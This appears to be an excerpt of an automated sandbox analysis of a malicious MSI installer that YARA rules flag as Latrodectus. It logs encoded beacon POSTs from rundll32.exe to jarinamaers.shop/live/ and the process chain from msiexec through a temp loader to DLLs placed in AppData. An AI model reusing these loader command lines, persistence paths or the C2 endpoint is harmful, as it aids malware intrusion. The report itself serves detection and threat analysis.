2024-04-25 20:44:27 UTC	252	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 72 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 30 35 68 35 42 7a 42 68 39 43 6e 57 47 65 4e 4a 4d 72 33 37 43 41 75 74 4b 62 31 36 62 4d 4b 37 51 79 67 63 70 65 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 37 7a 4e 71 47 46 76 65 5a 53 63 6a 71 4c 63 4c 76 51 67 4a 47 67 59 57 79 52 47 52 6f 52 6c 6d 53 4e 43 2f 70 35 54 77 48 6d 6e 42 61 6c 43 6c 4e 76 6a 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 61 36 63 6c 46 4b 32 69 34 75 74 78 33 49 55 57 65 54 52 70 4e 39 77 42 56 51 30 31 71 59 6c 65 79 6c 70 4d 43 66 33 62 35 62 51 70 78 79 77 4a 54 69 31 64 76 36 6f 4e 6b 59 79 62 65 6d 6e 4d 53 4b 54 62 2f 69 56 2b 46 34 54 63 2b 54 65 70 50 48 54 42 41 58 47 70 6e 41 Data Ascii: YjOeEyiMk3RrE5vcC/HWCbEd2NSiC05h5BzBh9CnWGeNJMr37CAutKb16bMK7QygcpeBWLUUfs9FloPMfPu+9sL8KXzJchOQ7zNqGFveZScjqLcLvQgJGgYWyRGRoRlmSNC/p5TwHmnBalClNvj6CW2j80hj8qSvsKa6clFK2i4utx3IUWeTRpN9wBVQ01qYleylpMCf3b5bQpxywJTi1dv6oNkYybemnMSKTb/iV+F4Tc+TepPHTBAXGpnA
2024-04-25 20:44:41 UTC	572	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 20:44:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BpiWyQnSnDiFI6Iq1IQfphq5i7czMF0QmY5BRiBrYOrp5rV9ya%2FwwGCB72YvhHtFFb1booq0c9qmAZpbt4kZ8H6elPRKRzkMuOQ6uYn9%2BrahNjd8nsx8osPPObzH9nk8k6kz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a12bd32906673e-ATL alt-svc: h3=":443"; ma=86400
2024-04-25 20:44:41 UTC	26	IN	Data Raw: 31 34 0d 0a 51 68 4f 6d 4d 42 32 6e 70 54 56 71 44 4a 4f 6f 63 51 3d 3d 0d 0a Data Ascii: 14QhOmMB2npTVqDJOocQ==
2024-04-25 20:44:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49724	104.21.46.75	443	2224	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-25 20:44:44 UTC	229	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: jarinamaers.shop Content-Length: 184 Cache-Control: no-cache
2024-04-25 20:44:44 UTC	184	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 71 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 30 35 68 35 42 7a 42 68 39 43 6e 57 47 65 4e 4a 4d 72 33 37 43 41 75 74 4b 62 31 36 62 4d 4b 37 51 79 67 63 70 65 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 37 7a 4e 71 47 46 76 65 5a 53 63 6a 71 4c 63 4c 76 51 67 4a 47 67 59 57 79 52 47 52 6f 52 6c 6d 53 4e 43 2f 70 35 54 77 48 6d 6e 42 61 6c 43 6c 4e 76 6a 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 61 36 63 6c 46 4b 32 69 34 75 74 78 33 49 55 57 65 54 52 70 4d 3d Data Ascii: YjOeEyiMk3RqE5vcC/HWCbEd2NSiC05h5BzBh9CnWGeNJMr37CAutKb16bMK7QygcpeBWLUUfs9FloPMfPu+9sL8KXzJchOQ7zNqGFveZScjqLcLvQgJGgYWyRGRoRlmSNC/p5TwHmnBalClNvj6CW2j80hj8qSvsKa6clFK2i4utx3IUWeTRpM=
2024-04-25 20:44:52 UTC	578	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 20:44:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qoApWU6emCaMTFqh4UFcKh%2FS4JgO8Dii0K%2FYH9m0gWk0v%2BgvJZNASctZuqrSNhOR6hQroIFKGClHpqj%2FA%2BcqCLq6ei1vhrusrbICB05QlBFwOib8aN%2Bs9lnG5V4UO9gSRhOp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a12c3a0bf86753-ATL alt-svc: h3=":443"; ma=86400
2024-04-25 20:44:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49725	104.21.46.75	443	2224	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-25 20:44:53 UTC	229	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: jarinamaers.shop Content-Length: 184 Cache-Control: no-cache
2024-04-25 20:44:53 UTC	184	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 70 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 30 35 68 35 42 7a 42 68 39 43 6e 57 47 65 4e 4a 4d 72 33 37 43 41 75 74 4b 62 31 36 62 4d 4b 37 51 79 67 63 70 65 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 37 7a 4e 71 47 46 76 65 5a 53 63 6a 71 4c 63 4c 76 51 67 4a 47 67 59 57 79 52 47 52 6f 52 6c 6d 53 4e 43 2f 70 35 54 77 48 6d 6e 42 61 6c 43 6c 4e 76 6a 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 61 36 63 6c 46 4b 32 69 34 75 74 78 33 49 55 57 65 54 52 70 4d 3d Data Ascii: YjOeEyiMk3RpE5vcC/HWCbEd2NSiC05h5BzBh9CnWGeNJMr37CAutKb16bMK7QygcpeBWLUUfs9FloPMfPu+9sL8KXzJchOQ7zNqGFveZScjqLcLvQgJGgYWyRGRoRlmSNC/p5TwHmnBalClNvj6CW2j80hj8qSvsKa6clFK2i4utx3IUWeTRpM=
2024-04-25 20:44:58 UTC	572	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 20:44:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o0oiwynJhUE%2BI0H8pxYueZx3GLsHpu8AYMcK3PpJeCweUR%2BKLzbiUwdw7DSQwuMHMzcc17q18vz5ioUV4PcHltl1GmHYnB%2B4wsI7i7HNxmwlttqBcrAMDqXhaBRynRmGd8sw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a12c728952452d-ATL alt-svc: h3=":443"; ma=86400
2024-04-25 20:44:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49727	104.21.46.75	443	2224	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-25 20:44:58 UTC	229	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: jarinamaers.shop Content-Length: 184 Cache-Control: no-cache
2024-04-25 20:44:58 UTC	184	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 30 35 68 35 42 7a 42 68 39 43 6e 57 47 65 4e 4a 4d 72 33 37 43 41 75 74 4b 62 31 36 62 4d 4b 37 51 79 67 63 70 65 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 37 7a 4e 71 47 46 76 65 5a 53 63 6a 71 4c 63 4c 76 51 67 4a 47 67 59 57 79 52 47 52 6f 52 6c 6d 53 4e 43 2f 70 35 54 77 48 6d 6e 42 61 6c 43 6c 4e 76 6a 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 61 36 63 6c 46 4b 32 69 34 75 74 78 33 49 55 57 65 54 52 70 4d 3d Data Ascii: YjOeEyiMk3RoE5vcC/HWCbEd2NSiC05h5BzBh9CnWGeNJMr37CAutKb16bMK7QygcpeBWLUUfs9FloPMfPu+9sL8KXzJchOQ7zNqGFveZScjqLcLvQgJGgYWyRGRoRlmSNC/p5TwHmnBalClNvj6CW2j80hj8qSvsKa6clFK2i4utx3IUWeTRpM=
2024-04-25 20:45:09 UTC	578	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 20:45:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n2O1M%2B%2BlDSMZ70P7mGcanKu9P4jPp4FqQ4Fy7MEyGlbySv7Ne7%2FF34qYCLE0WxJv%2BMovO%2FAnTpnkuOm6YuV7YyVQQGXm7iz83n7gjxE39Jsv3HEYG12fgkk%2Bbz4IF57ENlj0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a12c957da61877-ATL alt-svc: h3=":443"; ma=86400
2024-04-25 20:45:09 UTC	162	IN	Data Raw: 39 63 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 69 7a 64 35 5a 48 39 71 74 56 32 58 35 45 38 74 46 4a 69 39 2b 4d 6e 69 58 44 36 41 4a 55 75 7a 5a 4f 2b 2b 42 47 72 63 6e 41 3d 3d 0d 0a Data Ascii: 9cQhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhuizd5ZH9qtV2X5E8tFJi9+MniXD6AJUuzZO++BGrcnA==
2024-04-25 20:45:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	22:42:57
Start date:	25/04/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\ad.msi"
Imagebase:	0x7ff6b2ca0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	2
Start time:	22:42:58
Start date:	25/04/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff6b2ca0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	3
Start time:	22:42:58
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding CFBB24A404B21769C19C85B2027D69FC C
Imagebase:	0x460000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	22:42:59
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 02B62BF455D61FC50D15E7A41AF45BC1
Imagebase:	0x460000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	22:42:59
Start date:	25/04/2024
Path:	C:\Windows\Installer\MSIB6D3.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Installer\MSIB6D3.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Imagebase:	0xb30000
File size:	399'328 bytes
MD5 hash:	B9545ED17695A32FACE8C3408A6A3553
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Target ID:	6
Start time:	22:43:00
Start date:	25/04/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Imagebase:	0x7ff6cb1a0000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000006.00000002.2113131628.0000026387CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Target ID:	7
Start time:	22:43:00
Start date:	25/04/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_71a2ec86.dll", homq
Imagebase:	0x7ff6cb1a0000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000003.3230953855.000002095BA10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000003.2974432949.000002095BA10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000002.3348940328.000002095B810000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000002.3349009831.000002095BA10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000002.3348957722.000002095B820000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000003.3287402342.000002095BA10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000003.3130529388.000002095BDE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000002.3348028990.000000E23987A000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Target ID:	8
Start time:	22:43:02
Start date:	25/04/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_71a2ec86.dll", homq
Imagebase:	0x7ff6cb1a0000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000002.2135345986.000002268D6C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000002.2135365322.000002268D6D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true